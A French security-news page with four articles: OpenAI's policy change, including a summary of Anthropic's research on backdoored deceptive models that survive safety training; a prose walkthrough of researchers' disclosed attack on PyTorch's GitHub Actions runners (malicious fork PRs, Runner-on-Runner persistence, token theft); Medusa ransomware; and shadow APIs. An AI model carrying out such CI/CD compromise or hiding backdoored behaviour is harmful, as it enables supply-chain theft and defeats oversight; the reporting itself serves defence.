Over 10 years we help companies reach their financial and branding goals. Engitech is a values-driven technology agency dedicated.

Gallery

Contacts

411 University St, Seattle, USA

engitech@oceanthemes.net

+1 -800-456-478-23

Sécurité informatique

OpenAI n’interdit plus l’usage de ses GPT Ă  des fins militaires

OpenAI a supprimĂ© les restrictions en « petits caractères » relatifs Ă  l’utilisation de sa technologie d’IA Ă  des fins militaires. Ce changement laisse entrevoir une position moins ferme de la sociĂ©tĂ© en matière de collaboration avec les entreprises de dĂ©fense.
Un petit texte supprimĂ©, mais qui en dit long. OpenAI a en effet effacĂ© la rĂ©fĂ©rence Ă  l’utilisation de sa technologie d’IA ou de ses grands modèles de langage Ă  des fins militaires. Avant cette modification intervenue le 10 janvier, la politique d’OpenAI interdisait spĂ©cifiquement l’utilisation de ses modèles pour le dĂ©veloppement d’armes, la guerre et l’armĂ©e, ainsi que les contenus qui promeuvent, encouragent ou dĂ©crivent des actes d’automutilation. OpenAI a dĂ©clarĂ© que les politiques mises Ă  jour rĂ©sument la liste et rendent le document plus « lisible » tout en offrant des « conseils spĂ©cifiques au service ».
La liste a Ă©tĂ© condensĂ©e dans ce que l’entreprise appelle les politiques universelles ou Universal Policies, qui interdisent Ă  quiconque d’utiliser ses services pour nuire Ă  autrui et interdisent la rĂ©utilisation ou la distribution de tout contenu issu de ses modèles pour nuire Ă  autrui. Alors que ce changement dans les politiques est interprĂ©tĂ© comme un affaiblissement progressif de la position de l’entreprise dans sa collaboration avec les entreprises de dĂ©fense ou liĂ©es Ă  l’armĂ©e, les « risques posĂ©s par les modèles IA de frontière » ont dĂ©jĂ  Ă©tĂ© soulignĂ©s par plusieurs experts, dont le CEO d’OpenAI, Sam Altman.
Mise en Ă©vidence des risques posĂ©s par l’IA
En mai dernier, des centaines de dirigeants de l’industrie IT, des universitaires et d’autres personnalitĂ©s ont signĂ© une lettre ouverte mettant en garde contre le risque d’extinction liĂ© Ă  l’Ă©volution de l’IA, affirmant que le contrĂ´le de cette technologie devait ĂŞtre une prioritĂ© mondiale absolue. « L’attĂ©nuation du risque d’extinction liĂ© Ă  l’IA devrait ĂŞtre une prioritĂ© mondiale au mĂŞme titre que d’autres risques sociĂ©taux comme les pandĂ©mies et les guerres nuclĂ©aires », peut-on lire dans la dĂ©claration publiĂ©e par le Center for AI Safety, dont le siège est Ă  San Francisco. Paradoxalement, les signataires les plus importants de la lettre sont Sam Altman et le CTO de Microsoft, Kevin Scott. Des dirigeants, des ingĂ©nieurs et des scientifiques du laboratoire de recherche en IA de Google, DeepMind, ont Ă©galement signĂ© le document. La première lettre contre l’utilisation de l’IA remonte au mois de mars, dans laquelle plus de 1100 personnalitĂ©s du monde de l’IT ont mis en garde les laboratoires qui rĂ©alisent des expĂ©riences Ă  grande Ă©chelle avec l’IA.
En octobre, OpenAI a dĂ©clarĂ© qu’elle prĂ©parait une Ă©quipe pour empĂŞcher ce que l’entreprise appelle les modèles IA « boundaries (tampons) » de dĂ©clencher une guerre nuclĂ©aire et d’autres menaces. « Nous pensons que les modèles IA de tampon, qui dĂ©passeront les capacitĂ©s actuellement prĂ©sentes dans les modèles existants les plus avancĂ©s, peuvent profiter Ă  l’ensemble de l’humanitĂ©. Mais ils posent aussi des risques de plus en plus graves », a dĂ©clarĂ© l’entreprise dans un billet de blog. En 2017, un groupe international d’experts en IA et en robotique a signĂ© une lettre ouverte aux Nations Unies pour mettre fin Ă  l’utilisation d’armes autonomes qui menacent une « troisième rĂ©volution dans les affaires militaires ». Toujours très paradoxalement, Elon Musk, qui a créé une entreprise d’IA baptisĂ©e X.AI, pour concurrencer OpenAI, figurait parmi ces experts.
Les rĂ©centes recherches d’Anthropic inquiètent
D’autres raisons devraient nous inquiĂ©ter davantage. Certains chercheurs affirment que les modèles d’IA dits « diaboliques » ou « mauvais » ne peuvent pas ĂŞtre rĂ©duits ou entraĂ®nĂ©s Ă  devenir « bons » avec les techniques existantes. Un document de recherche, dirigĂ© par Anthropic, qui a voulu savoir s’il Ă©tait possible d’enseigner Ă  un système d’IA un comportement mensonger ou une stratĂ©gie fallacieuse, a montrĂ© que l’on pouvait rendre ce genre de comportement persistant. « Nous constatons qu’un tel comportement peut ĂŞtre rendu persistant, de sorte qu’il n’est pas Ă©liminĂ© par les techniques courantes d’entraĂ®nement Ă  la sĂ©curitĂ©, y compris le rĂ©glage fin supervisĂ©, l’apprentissage par renforcement et la formation contradictoire (susciter un comportement dangereux et s’entraĂ®ner Ă  l’Ă©liminer) », ont Ă©crit les chercheurs.
« Nos rĂ©sultats suggèrent qu’une fois qu’un modèle prĂ©sente un comportement trompeur, les techniques courantes pourraient ne pas rĂ©ussir Ă  Ă©liminer cette tromperie et Ă  crĂ©er une fausse impression de sĂ©curité », ont-ils ajoutĂ©. Selon les chercheurs, ce qui est encore plus inquiĂ©tant, c’est que « l’utilisation d’un entrainement contradictoire pour mettre fin au comportement trompeur des modèles peut leur apprendre Ă  mieux reconnaĂ®tre le dĂ©clencheur de leur porte dĂ©robĂ©e, et de dissimuler ainsi efficacement un comportement dangereux ».

Sécurité informatique

Des chercheurs dĂ©montrent une technique d’attaque avec PyTorch

Un PoC d’exploit dĂ©voilĂ© par des chercheurs en sĂ©curitĂ© montre qu’il est possible de tĂ©lĂ©charger des versions malveillantes de PyTorch sur GitHub en exploitant des erreurs de configuration dans son service Actions.
L’union fait la force. Un duo de chercheurs en sĂ©curitĂ© a rĂ©ussi Ă  infiltrer l’infrastructure de dĂ©veloppement de PyTorch en utilisant des techniques qui exploitent des configurations non sĂ©curisĂ©es dans les flux de travail GitHub Actions. Leur attaque a Ă©tĂ© divulguĂ©e dans le cadre d’une dĂ©marche de hacking Ă©thique au dĂ©veloppeur principal de PyTorch, Meta AI, mais d’autres sociĂ©tĂ©s de dĂ©veloppement de logiciels utilisant GitHub Actions ont probablement fait les mĂŞmes erreurs, s’exposant potentiellement Ă  des attaques sur leur cycle de dĂ©veloppement logiciel. « Notre mĂ©thode d’exploitation a permis de tĂ©lĂ©charger des versions malveillantes de PyTorch sur GitHub, de tĂ©lĂ©charger des versions sur AWS, d’ajouter potentiellement du code Ă  la branche principale du dĂ©pĂ´t, de crĂ©er des portes dĂ©robĂ©es dans les dĂ©pendances de PyTorch – la liste est longue », a dĂ©clarĂ© le chercheur en sĂ©curitĂ© John Stawinski dans un article dĂ©taillĂ© sur l’attaque publiĂ© sur son blog personnel. « En bref, c’Ă©tait mauvais. Très mauvais ».
John Stawinski a conçu l’attaque avec son collègue Adnan Khan. Tous deux travaillent comme ingĂ©nieurs en sĂ©curitĂ© pour la sociĂ©tĂ© de cybersĂ©curitĂ© Praetorian et, l’Ă©tĂ© dernier, ils ont commencĂ© Ă  Ă©tudier et Ă  dĂ©velopper une classe d’exploits inĂ©dite pour les plateformes d’intĂ©gration et de livraison continues (CI/CD). L’une de leurs premières cibles a Ă©tĂ© GitHub Actions, un service CI/CD pour automatiser la conception et le test du code logiciel en dĂ©finissant des workflows s’exĂ©cutant automatiquement Ă  l’intĂ©rieur de conteneurs sur l’infrastructure GitHub ou sur celle de l’utilisateur. Adnan Khan a initialement trouvĂ© une vulnĂ©rabilitĂ© critique qui aurait pu conduire Ă  l’empoisonnement des images officielles des runners du service Actions. Les « runners » sont les machines virtuelles qui exĂ©cutent les actions de construction dĂ©finies dans les flux de travail de GitHub Actions. Après avoir signalĂ© cette faille à la filiale de Microsoft et reçu une prime de 20 000 $, Adnan Khan s’est rendu compte que le problème principal qu’il avait dĂ©couvert Ă©tait systĂ©mique et que des milliers d’autres dĂ©pĂ´ts Ă©taient probablement concernĂ©s.
L’exĂ©cution risquĂ©e d’actions GitHub auto-hĂ©bergĂ©es
Depuis, Adnan Khan et John Stawinski ont trouvĂ© des vulnĂ©rabilitĂ©s dans les rĂ©fĂ©rentiels logiciels et l’infrastructure de dĂ©veloppement de grandes entreprises et de projets logiciels et ont rĂ©coltĂ© des centaines de milliers de dollars de rĂ©compenses dans le cadre de programmes de bug bounty. Parmi leurs « victimes » figurent Microsoft Deepspeed, une application Cloudflare, la bibliothèque d’apprentissage automatique TensorFlow, les portefeuilles de crypto-monnaie et les nĹ“uds de plusieurs blockchains, ainsi que PyTorch, l’un des frameworks d’apprentissage automatique open source les plus utilisĂ©s. Il a Ă©tĂ© dĂ©veloppĂ© Ă  l’origine par Meta AI, une filiale de Meta (anciennement Facebook), mais son dĂ©veloppement est dĂ©sormais rĂ©gi par la Fondation PyTorch, une sociĂ©tĂ© indĂ©pendante agissant sous l’Ă©gide de la Fondation Linux. « Nous avons commencĂ© par dĂ©couvrir toutes les nuances de l’exploitation d’Actions, en exĂ©cutant des outils, des tactiques et des procĂ©dures (TTP) qui n’avaient jamais Ă©tĂ© vus auparavant dans la nature », a expliquĂ© John Stawinski dans un billet de blog au dĂ©but du mois. « Au fur et Ă  mesure que nos recherches avançaient, nous avons fait Ă©voluer nos TTP pour attaquer plusieurs plateformes CI/CD, notamment GitHub Actions, Buildkite, Jenkins et CircleCI ».
GitHub propose diffĂ©rents types de « runners » prĂ©configurĂ©s (Windows, Linux et macOS) s’exĂ©cutant directement sur l’infrastructure de GitHub et utilisĂ©s pour tester et crĂ©er des applications pour ces systèmes d’exploitation. Cependant, les utilisateurs ont Ă©galement la possibilitĂ© de dĂ©ployer l’agent de conception Actions sur leurs propres infrastructures et de le lier Ă  leur entreprise et Ă  leurs dĂ©pĂ´ts GitHub. Ces solutions sont connues sous le nom de runners auto-hĂ©bergĂ©s et apportent plusieurs avantages tels que l’exĂ©cution de diffĂ©rentes versions de systèmes d’exploitation et de combinaisons de matĂ©riel, ainsi que des outils logiciels supplĂ©mentaires que les runners hĂ©bergĂ©s de GitHub ne fournissent pas. Compte tenu de cette flexibilitĂ©, il n’est pas surprenant que de nombreux projets et sociĂ©tĂ©s choisissent de dĂ©ployer des runners auto-hĂ©bergĂ©s. C’Ă©tait Ă©galement le cas pour PyTorch, qui utilise largement les agents de construction hĂ©bergĂ©s par GitHub et les agents de construction auto-hĂ©bergĂ©s. Le groupe possède plus de 70 fichiers de workloads diffĂ©rents dans ses rĂ©fĂ©rentiels et en exĂ©cute gĂ©nĂ©ralement plus de 10 par heure.
Des paramètres Github par dĂ©faut qui n’aident pas
Les flux d’actions sont dĂ©finis dans des fichiers .yml qui contiennent des instructions en syntaxe YAML sur les commandes Ă  exĂ©cuter et sur les exĂ©cutants. Ces workflows sont dĂ©clenchĂ©s automatiquement sur diffĂ©rents Ă©vĂ©nements – par exemple, pull_request (PR) – lorsque quelqu’un propose une modification de code pour une branche du rĂ©fĂ©rentiel. C’est utile parce que le flux de travail se dĂ©clenche et peut exĂ©cuter par exemple une sĂ©rie de tests sur le code avant mĂŞme qu’un rĂ©viseur humain ne l’examine et ne dĂ©cide de le fusionner. « Le fait que certains paramètres par dĂ©faut de GitHub ne soient pas très sĂ»rs ne facilite pas les choses », indique John Stawinski. « Par dĂ©faut, lorsqu’un runner auto-hĂ©bergĂ© est attachĂ© Ă  un dĂ©pĂ´t, tous les workflows de ce dĂ©pĂ´t peuvent utiliser ce runner. Ce paramètre s’applique Ă©galement aux flux de travail issus des requĂŞtes pull pour un fork. Rappelez-vous que n’importe qui peut soumettre une demande de fork pull requests Ă  un dĂ©pĂ´t GitHub public. Oui, mĂŞme vous. Le rĂ©sultat de ces paramètres est que, par dĂ©faut, n’importe quel contributeur du dĂ©pĂ´t peut exĂ©cuter du code sur le runner auto-hĂ©bergĂ© en soumettant un PR malveillant ».
Une demande de fork signifie que quelqu’un a créé une copie personnelle de ce dĂ©pĂ´t, a travaillĂ© dessus, et essaie maintenant de fusionner les changements. Il s’agit d’une pratique courante, car les contributeurs travaillent souvent sur leurs propres forks avant de soumettre les modifications au dĂ©pĂ´t principal pour approbation. Du point de vue de GitHub, un contributeur est toute personne dont les demandes d’extraction ont Ă©tĂ© fusionnĂ©es dans la branche et le paramètre par dĂ©faut pour l’exĂ©cution du flux de travail est d’exĂ©cuter automatiquement les demandes d’extraction du fork des anciens contributeurs. Cela signifie que si quelqu’un a dĂ©jĂ  eu un fork pull requests fusionnĂ©, les workflows s’exĂ©cuteront automatiquement pour tous les prochains. Ce paramètre peut ĂŞtre modifiĂ© pour exiger l’approbation avant d’exĂ©cuter les workflows sur tous ses PR que le propriĂ©taire soit un ancien contributeur ou non.
Utiliser le gestionnaire d’actions GitHub comme un cheval de Troie
« En consultant l’historique des demandes d’extraction, nous avons trouvĂ© plusieurs PR de contributeurs prĂ©cĂ©dents qui ont dĂ©clenchĂ© des flux de travail pull_request sans nĂ©cessiter d’approbation », d’après les chercheurs. « Cela indique que le rĂ©fĂ©rentiel n’exigeait pas l’approbation du workload pour les PR du fork des contributeurs prĂ©cĂ©dents. Bingo ». Ainsi, un attaquant devrait d’abord devenir un contributeur en soumettant un fork PR lĂ©gitime qui est fusionnĂ©, puis il pourrait abuser de son nouveau privilège pour en crĂ©er un fork et Ă©crire un fichier de workload malveillant Ă  l’intĂ©rieur, puis faire une demande de pull. Ainsi, ce flux corrompu serait automatiquement exĂ©cutĂ© sur le Github Actions auto-hĂ©bergĂ© de l’entreprise. Cela peut sembler compliquĂ© mais en dĂ©finitif ce n’est pas le cas. Il n’est en effet pas nĂ©cessaire d’ajouter de nouvelles fonctionnalitĂ©s Ă  un projet pour devenir contributeur, les chercheurs ayant obtenu ce statut pour PyTorch en trouvant une coquille dans un fichier de documentation et en faisant un PR pour la corriger. Une fois leur correction grammaticale mineure acceptĂ©e, ils ont alors eu la possibilitĂ© d’exĂ©cuter des flux de travail malveillants.
Un autre comportement par dĂ©faut des runners Actions auto-hĂ©bergĂ©s est qu’ils ne sont pas Ă©phĂ©mères, pas rĂ©initialisĂ©s et pas non plus effacĂ©s une fois qu’un workload est achevĂ©. « Cela signifie que le workload malveillant peut dĂ©marrer un processus en arrière-plan qui continuera Ă  s’exĂ©cuter après la fin du travail, et que les modifications apportĂ©es aux fichiers (tels que les programmes sur le chemin, etc.) persisteront au-delĂ  du flux de travail actuel », ont dĂ©clarĂ© les chercheurs. « Cela signifie Ă©galement que les workloads futurs s’exĂ©cuteront sur ce mĂŞme runner ». Il s’agit donc d’une bonne cible pour dĂ©ployer un cheval de Troie qui se connecte aux attaquants et recueille toutes les informations sensibles exposĂ©es par les futures exĂ©cutions du flux de travail. Mais qu’utiliser comme trojan qui ne serait pas dĂ©tectĂ© par les produits antivirus ou dont les communications ne seraient pas bloquĂ©es ? L’agent runner Actions lui-mĂŞme, ou plutĂ´t une autre instance de cet agent non liĂ©e Ă  une entreprise utilisant PyTorch mais une instance GitHub contrĂ´lĂ©e par les attaquants. « Notre technique Runner on Runner (RoR) utilise les mĂŞmes serveurs pour C2 que le runner existant, et le seul binaire que nous laissons tomber est le binaire officiel de l’agent d’exĂ©cution GitHub qui est dĂ©jĂ  en cours d’exĂ©cution sur le système. Au-revoir les protections EDR et pare-feu », a dĂ©clarĂ© John Stawinski.
Le Graal de l’extraction de jetons d’accès sensibles
Jusqu’Ă  cette Ă©tape, les attaquants ont rĂ©ussi Ă  faire tourner un programme trojan très furtif dans une machine qui fait partie de l’infrastructure de dĂ©veloppement de l’organisation et qui est utilisĂ©e pour exĂ©cuter des tâches sensibles dans le cadre de son pipeline CI/CD. L’Ă©tape suivante est la post-exploitation : il s’agit d’essayer d’exfiltrer des donnĂ©es sensibles et de les faire pivoter vers d’autres parties de l’infrastructure. Les flux de travail comprennent souvent des jetons d’accès Ă  GitHub lui-mĂŞme ou Ă  d’autres services tiers. Ceux-ci sont nĂ©cessaires pour que les tâches dĂ©finies dans le workload s’exĂ©cutent correctement. Par exemple, l’agent de construction a besoin de privilèges de lecture pour vĂ©rifier d’abord le rĂ©fĂ©rentiel et peut Ă©galement avoir besoin d’un accès en Ă©criture pour publier le binaire rĂ©sultant en tant que nouvelle version ou pour modifier les versions existantes. Ces jetons sont stockĂ©s sur le système de fichiers du runner Ă  diffĂ©rents endroits comme le fichier de configuration .git ou dans des variables d’environnement et peuvent Ă©videmment ĂŞtre lus par le « trojan » furtif qui s’exĂ©cute avec les privilèges root. Certains, comme GITHUB_TOKEN, sont Ă©phĂ©mères et ne sont valables que pendant l’exĂ©cution du flux de travail, mais les chercheurs ont trouvĂ© des moyens de prolonger leur durĂ©e de vie. MĂŞme s’ils n’avaient pas trouvĂ© ces mĂ©thodes, de nouveaux workloads avec des tokens nouvellement gĂ©nĂ©rĂ©s peuvent ĂŞtre exĂ©cutĂ©s en permanence sur un dĂ©pĂ´t très actif comme PyTorch, leur potentiel en rĂ©serve est donc consĂ©quent.
« Le dĂ©pĂ´t PyTorch utilisait des secrets GitHub pour permettre aux runners d’accĂ©der Ă  des systèmes sensibles pendant le processus de publication automatisĂ© », a dĂ©clarĂ© John Stawinski. « Le rĂ©fĂ©rentiel utilisait de nombreux secrets, notamment plusieurs jeux de clĂ©s AWS et des jetons d’accès personnels GitHub (PAT) ». Les PAT disposent souvent de nombreux privilèges et constituent une cible attrayante pour les attaquants, mais dans ce cas, ils ont Ă©tĂ© utilisĂ©s dans le cadre de workloads ne s’exĂ©cutant pas sur le runner auto-hĂ©bergĂ© compromis. Cependant, les chercheurs ont trouvĂ© des moyens d’utiliser les jetons GitHub Ă©phĂ©mères qu’ils ont pu collecter pour placer du code malveillant dans des flux de travail s’exĂ©cutant sur d’autres runners et contenaient ces PAT. « Il s’avère que vous ne pouvez pas utiliser un GITHUB_TOKEN pour modifier les fichiers de flux de travail », selon John Stawinski. « Cependant, nous avons dĂ©couvert plusieurs solutions de contournement exotiques pour ajouter du code malveillant Ă  un flux de travail en utilisant un GITHUB_TOKEN. Dans ce scĂ©nario, weekly.yml faisait appel Ă  un autre workload utilisant un script en dehors du rĂ©pertoire .github/workflows. Nous pouvons ajouter notre code Ă  ce script dans notre branche. Ensuite, nous pourrions dĂ©clencher ce flux de travail sur notre branche, ce qui exĂ©cuterait notre code malveillant. Si cela vous semble dĂ©routant, ne vous inquiĂ©tez pas, c’est Ă©galement le cas pour la plupart des programmes de rĂ©compense des bugs ».
En d’autres termes, mĂŞme si un attaquant ne peut pas modifier un workflow directement, il peut ĂŞtre en mesure de modifier un script externe appelĂ© par ce flux de travail afin d’obtenir de cette façon son code malveillant. Les dĂ©pĂ´ts et les flux de travail CI/CD peuvent devenir assez complexes avec de nombreuses interdĂ©pendances, de sorte que de tels petits oublis ne sont pas rares. MĂŞme sans les PAT, le seul GITHUB_TOKEN dotĂ© de privilèges en Ă©criture aurait Ă©tĂ© suffisant pour empoisonner les versions de PyTorch sur GitHub, et les clĂ©s AWS extraites sĂ©parĂ©ment auraient pu ĂŞtre utilisĂ©es pour ouvrir une porte dĂ©robĂ©e sur les versions de PyTorch hĂ©bergĂ©es sur le compte AWS de l’entreprise. « Il y avait d’autres ensembles de clĂ©s AWS, des PAT GitHub et diverses informations d’identification que nous aurions pu voler, mais nous pensions que nous avions une dĂ©monstration claire de l’impact Ă  ce stade », ont fait savoir les chercheurs. « Compte tenu de la nature critique de la vulnĂ©rabilitĂ©, nous voulions soumettre le rapport dès que possible avant que l’un des 3 500 contributeurs de PyTorch ne dĂ©cide de conclure un accord avec un acteur malveillant Ă©tranger ».
Des actions pour atténuer les risques liés aux flux de travail CI/CD
Les Ă©diteurs de logiciels peuvent tirer de nombreux enseignements de cette attaque : des risques associĂ©s Ă  l’exĂ©cution de runners d’actions GitHub auto-hĂ©bergĂ©s dans des configurations par dĂ©faut aux workflows exĂ©cutant des scripts en dehors de leur rĂ©pertoire. Ou encore ceux liĂ©s aux jetons d’accès Ă  privilèges et aux applications lĂ©gitimes transformĂ©es en chevaux de Troie comme d’autres chercheurs l’ont aussi trouvĂ© avec l’agent AWS System Manager et la solution SSO et de gestion des terminaux de Google pour Windows. « La sĂ©curisation et la protection des runners relèvent de la responsabilitĂ© des utilisateurs finaux, et non de GitHub. C’est pourquoi GitHub recommande de ne pas utiliser de runners auto-hĂ©bergĂ©s sur des dĂ©pĂ´ts publics », a indiquĂ© John Stawinski. « Apparemment, tout le monde n’Ă©coute pas GitHub, y compris GitHub ». 
Cependant, si les runners auto-hĂ©bergĂ©s sont nĂ©cessaires, les sociĂ©tĂ©s devraient au moins envisager de changer le paramètre par dĂ©faut de « require approval for first-time contributors » en « require approval for all outside collaborators ». C’est Ă©galement une bonne idĂ©e de rendre les runners auto-hĂ©bergĂ©s Ă©phĂ©mères et d’exĂ©cuter les workflows Ă  partir des fork PR uniquement sur les runners hĂ©bergĂ©s sur GitHub. Ce n’est pas la première fois que l’utilisation non sĂ©curisĂ©e des fonctionnalitĂ©s de GitHub Actions gĂ©nère des risques pour la sĂ©curitĂ© de la chaĂ®ne d’approvisionnement des logiciels. D’autres services et plateformes CI/CD ont Ă©galement prĂ©sentĂ© leurs propres vulnĂ©rabilitĂ©s et des configurations par dĂ©faut non sĂ©curisĂ©es. « Les problèmes liĂ©s Ă  ces voies d’attaque ne sont pas propres Ă  PyTorch », ont expliquĂ© les chercheurs. « Ils ne sont pas non plus propres aux dĂ©pĂ´ts ML ou mĂŞme Ă  GitHub. Nous avons dĂ©montrĂ© Ă  plusieurs reprises les faiblesses de la chaĂ®ne d’approvisionnement en exploitant les vulnĂ©rabilitĂ©s de CI/CD dans les organisations technologiques les plus avancĂ©es du monde sur plusieurs plateformes CI/CD, et celles-ci ne reprĂ©sentent qu’un petit sous-ensemble de la plus grande surface d’attaque ».

Sécurité informatique

Le groupe Medusa intensifie ses campagnes de ransomware

Sartrouville, Betton, Toyota, ces noms ont un point commun, ils ont été frappés par le groupe de ransomware Medusa. Ses activités ne faiblissent pas selon un rapport publié par Unit42 de Palo Alto Networks. Les experts ont découvert un blog du gang proposant de multiples solutions de paiement aux victimes. Le blog sert également à publier des données volées au cas où la victime refuse de payer la rançon.  Sur le site « onion », auquel on peut accéder via le réseau Tor, la victime peut voir le « compte à rebours » avant la date d’exposition publique des données et de leur disponibilité en téléchargement, un tarif pour leur suppression et un tarif pour retarder leur divulgation (10 000 dollars).
En plus du blog, le groupe a créé un canal Telegram public appelĂ© « Information support », plus facilement accessible que les sites traditionnels sur le Dark Web, oĂą il expose les fichiers volĂ©s Ă  des entreprises compromises. « L’an dernier, un nombre important de vulnĂ©rabilitĂ©s très graves, accessibles sur Internet, ont pu ĂŞtre exploitĂ©es par les groupes de ransomwares », a dĂ©clarĂ© Anthony Galiette, ingĂ©nieur spĂ©cialisĂ© en rĂ©tro-ingĂ©nierie de l’Unit42. « Nous pensons que ces vulnĂ©rabilitĂ©s critiques ont contribuĂ© Ă  l’augmentation de l’activitĂ© de Medusa ces derniers mois », a-t-il ajoutĂ©.
Aucun code d’Ă©thique
Il y a peut-ĂŞtre une autre raison qui explique l’activitĂ© accrue de Medusa. « Le groupe, qui a eu beaucoup de succès ces derniers temps, s’est spĂ©cifiquement concentrĂ© sur le secteur de la santé », a fait remarquer Darren Williams, CEO et fondateur de BlackFog, une entreprise spĂ©cialisĂ©e dans la sĂ©curitĂ© des endpoint. « C’est probablement ce qui a contribuĂ© Ă  leur succès, car le secteur de la santĂ© est Ă  la fois riche en donnĂ©es, mais en retard en termes de pratiques de cybersĂ©curitĂ© et d’investissements, et qu’il utilise encore beaucoup de matĂ©riel et de logiciels anciens », a-t-il ajoutĂ©.
« Si les capacitĂ©s techniques varient d’un groupe de ransomware Ă  l’autre, Medusa est l’un des rares Ă  utiliser des outils comme NetScan pour prĂ©parer et dĂ©ployer des ransomwares », a dĂ©clarĂ© pour sa part Doel Santos, chercheur principal en menaces de l’Unit42, Ă  propos du gang Medusa, ajoutant que, contrairement Ă  ce que prĂ©tendent certains groupes, Medusa n’a pas de code d’Ă©thique. « Tout au long de l’annĂ©e 2023, le groupe a compromis plusieurs acadĂ©mies scolaires et exposĂ© des informations très sensibles sur les Ă©lèves », a indiquĂ© l’expert.
Des courtiers d’accès initial pour accĂ©der au rĂ©seau
Medusa se distingue Ă©galement par le fait qu’il dispose de sa propre Ă©quipe chargĂ©e des mĂ©dias et de l’image de marque, qu’il se concentre sur l’exploitation des vulnĂ©rabilitĂ©s orientĂ©es vers Internet et qu’il utilise des courtiers d’accès initial (Initial Access Brokers, IAB) pour accĂ©der aux systèmes. « Les courtiers d’accès initial offrent aux acteurs de la menace d’accĂ©der Ă  la porte d’entrĂ©e d’une entreprise », a expliquĂ© Anthony Galiette. « MalgrĂ© le coĂ»t que cela reprĂ©sente, l’utilisation de ces courtiers par des groupes s’est avĂ©rĂ©e très lucrative dans le passé », a-t-il encore dĂ©clarĂ©.
« Dans l’ensemble, nous constatons que les groupes de ransomwares les plus actifs ou les plus avancĂ©s utilisent des courtiers d’accès initiaux. Les groupes de ransomwares plus petits ou Ă©mergents n’ont pas nĂ©cessairement le capital nĂ©cessaire pour utiliser les IAB de la mĂŞme manière », a ajoutĂ© Anthony Galiette. Le groupe pratique Ă©galement le double rançonnage. « L’utilisation d’une double rançon est une autre caractĂ©ristique de Medusa, qui utilise une rançon pour dĂ©crypter les parties cryptĂ©es d’un environnement et une rançon distincte pour Ă©viter la fuite des donnĂ©es volĂ©es aux victimes sur Internet », a expliquĂ© Steve Stone, directeur de Rubrik Zero Labs, l’unitĂ© de recherche en cybersĂ©curitĂ© du spĂ©cialiste de la sauvegarde cloud.
Le ciblage indiscriminé, une menace universelle des acteurs du ransomware
« L’Ă©mergence de Medusa Ă  la fin de 2022 et sa notoriĂ©tĂ© en 2023 marquent une Ă©volution significative dans le paysage des ransomwares », indique encore le rapport de Unit42. Cette opĂ©ration met en Ă©vidence des mĂ©thodes de propagation complexes, tirant parti Ă  la fois des vulnĂ©rabilitĂ©s du système et des courtiers d’accès initiaux, tout en Ă©vitant habilement la dĂ©tection grâce Ă  des techniques de persistance. « Le blog de Medusa tĂ©moigne d’une Ă©volution tactique vers l’extorsion multiple, le groupe employant des moyens de pression transparents sur les victimes par le biais de demandes de rançon rendues publiques en ligne ». Ă€ ce jour, 74 entreprises de secteurs très divers ont Ă©tĂ© touchĂ©es.
Ce ciblage aveugle de Medusa souligne la menace universelle que reprĂ©sente ces groupes de cybercriminels. « Comme le montrent les statistiques, le problème ne fait pas que s’aggraver, il s’accĂ©lère Ă  un rythme de plus en plus difficile Ă  suivre pour les entreprises », a ajoutĂ© M. Williams. « Il faut aussi reconnaĂ®tre que la rĂ©volution de l’IA joue un rĂ´le dans cette tendance, car, comme on peut le voir, les acteurs de la menace entraĂ®nent dĂ©sormais leurs systèmes sur les vulnĂ©rabilitĂ©s, les produits et les personnes », a-t-il ajoutĂ©. « MĂŞme si les entreprises de cybersĂ©curitĂ© utilisent Ă©galement l’IA pour la prĂ©vention, dans ce jeu du chat et de la souris, les entreprises n’adoptent pas ces nouvelles technologies assez rapidement, ou pas du tout, pour disposer de la protection adĂ©quate ».

Sécurité informatique

Les shadow API exposent les entreprises Ă  des attaques

Selon une Ă©tude, les entreprises ne parviennent pas Ă  se dĂ©fendre totalement ou s’appuient sur une protection incomplète des API, sans visibilitĂ© en temps rĂ©el.
Selon un rapport de Cloudflare, en raison du manque de visibilitĂ© des entreprises sur les API utilisĂ©es, celles-ci sont devenues plus complexes Ă  gĂ©rer et Ă  protĂ©ger contre les abus. Le rapport, basĂ© sur les modèles de trafic observĂ©s par le rĂ©seau du fournisseur entre octobre 2022 et aoĂ»t 2023, a rĂ©vĂ©lĂ© que les entreprises ne parviennent pas Ă  se dĂ©fendre entièrement ou s’appuient sur une protection incomplète des API, sans visibilitĂ© en temps rĂ©el.
« Les API sont difficiles à protéger contre les abus. Elles nécessitent un contexte métier, des méthodes de découverte et des contrôles de vérification des accès plus approfondis que les autres services de sécurité des applications web », a expliqué l’éditeur dans son rapport. « Ceux qui mettent en œuvre la sécurité des API sans avoir une image précise et en temps réel de leur environnement API peuvent bloquer involontairement le trafic légitime ». Le réseau Cloudflare sur lequel se base le rapport comprend des données provenant de ses services de pare-feu d’applications web (Web Application Firewall, WAF), de protection DDoS, de gestion des bots et de passerelle API.
Le shadow API ouvre la surface d’attaque
Dans son analyse, Cloudflare conclut que le trafic API dĂ©passe le reste du trafic Internet. « Les dĂ©veloppeurs d’applications utilisent de plus en plus des architectures modernes, basĂ©es sur les microservices, et ils ont besoin d’API pour accĂ©der aux services, aux donnĂ©es ou Ă  d’autres applications afin de fournir des fonctionnalitĂ©s plus riches aux utilisateurs de leurs applications », a dĂ©clarĂ© Melinda Marks, analyste senior chez le consultant ESG. « Mais cela signifie plus de surface d’attaque, donc si les API ne sont pas sĂ©curisĂ©es, cela crĂ©e un point d’entrĂ©e pour accĂ©der Ă  ces services, donnĂ©es ou autres applications », a-t-elle ajoutĂ©. Cloudflare a Ă©galement observĂ© que de nombreuses entreprises ne disposent pas d’un inventaire complet de leurs API, ce qui les rend difficiles Ă  gĂ©rer. Les outils de machine learning du fournisseur ont dĂ©couvert près de 31 % d’API REST (Representational State Transfer) en plus que ceux observĂ©s par les identificateurs de session fournis par les clients.
